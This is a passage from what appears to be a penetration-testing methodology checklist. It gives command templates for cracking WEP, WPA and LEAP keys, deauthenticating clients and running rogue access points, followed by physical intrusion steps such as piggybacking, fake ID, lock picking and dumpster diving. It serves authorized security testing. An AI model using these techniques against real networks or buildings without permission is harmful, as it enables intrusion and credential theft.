WEP encrypted WLAN, Visible SSID, WEPattack, wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network], Capture / Inject packets, Break WEP, Aircrack-ptw, aircrack-ptw [pcap file], Aircrack-ng, aircrack -q -n [WEP key length] -b [BSSID] [pcap file], Airsnort, Channel > Start, WEPcrack, perl, ./ -b 13 -i wlan0, Hidden SSID, Deauth client, Aireplay-ng, aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface], Commview, Tools > Node reassociation, Void11, void11_hopper, void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]

WPA / WPA2 encrypted WLAN, Deauth client, Capture EAPOL handshake, WPA / WPA 2 dictionary attack, coWPAtty, ./cowpatty -r [pcap file] -f [wordlist] -s [SSID], ./genpmk -f dictionary_file -d hashfile_name -s ssid, ./cowpatty -r cature_file.cap -d hashfile_name -s ssid, Aircrack-ng, aircrack-ng -a 2 -w [wordlist] [pcap file]

LEAP encrypted WLAN, Deauth client, Break LEAP, asleap, ./asleap -r data/libpcap_packet_capture_file.dump -f output_pass+hash file.dat -n output_index_filename.idx, ./genkeys -r dictionary_file -f output_pass+hash file.dat -n output_index_filename.idx, THC-LEAPcracker, leap-cracker -f [wordlist] -t [NT challenge response] -c [challenge]

802.1x WLAN, Create Rogue Access Point, Airsnarf, Deauth client, Associate client, Compromise client, Acquire passphrase / certificate, wzcook, Obtain user's certificate, fake ap, perl --interface wlan0, perl --interface wlan0 --channel 11 --essid fake_name --wep 1 --key [WEP KEY], Hotspotter, Deauth client, Associate client, Compromise client, Acquire passphrase / certificate, wzcook, Obtain user's certificate, Karma, Deauth client, Associate client, Compromise client, Acquire passphrase / certificate, wzcook, Obtain user's certificate, ./bin/karma etc/karma-lan.xml, Linux rogue AP, Deauth client, Associate client, Compromise client, Acquire passphrase / certificate, wzcook, Obtain user's certificate

Resources, URL's,, Russix,, Wireless Vulnerabilities and Exploits (WVE), White Papers, Weaknesses in the Key Scheduling Algorithm of RC4, 802.11b Firmware-Level Attacks, Wireless Attacks from an Intrusion Detection Perspective, Implementing a Secure Wireless Network for a Windows Environment, Breaking 104 bit WEP in less than 60 seconds, PEAP Shmoocon2008 Wright & Antoniewicz, Active behavioral fingerprinting of wireless devices, Common Vulnerabilities and Exploits (CVE), Vulnerabilties and exploit information relating to these products can be found here:

Physical Security

Building Security

Meeting Rooms, Check for active network jacks., Check for any information in room.

Lobby, Check for active network jacks., Does receptionist/guard leave lobby?, Accessbile printers? Print test page., Obtain phone/personnel listing.

Communal Areas, Check for active network jacks., Check for any information in room., Listen for employee conversations.

Room Security, Resistance of lock to picking., What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?, Ceiling access areas., Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

Windows, Check windows/doors for visible intruderalarm sensors., Check visible areas for sensitive information., Can you video users logging on?

Perimeter Security

Fence Security, Attempt to verify that the whole of the perimeter fence is unbroken.

Exterior Doors, If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

Guards, Patrol Routines, Analyse patrol timings to ascertain if any holes exist in the coverage., Communications, Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

Entry Points

Guarded Doors, Piggybacking, Attempt to closely follow employees into thebuilding without having to show valid credentials., Fake ID, Attempt to use fake ID to gain access., Access Methods, Test 'out of hours' entry methods

Unguarded Doors, Identify all unguardedentry points., Are doors secured?, Check locks for resistance to lock picking.

Windows, Check windows/doors for visible intruderalarm sensors., Attempt to bypass sensors.

Office Waste

Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

Final Report - template


Matt Byrne (

Matt contributed the majority of the Wireless section.

Arvind Doraiswamy (

Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

Lee Lawson (

Lee contributed the majority of the Cisco and Social Engineering sections.

Nabil OUCHN (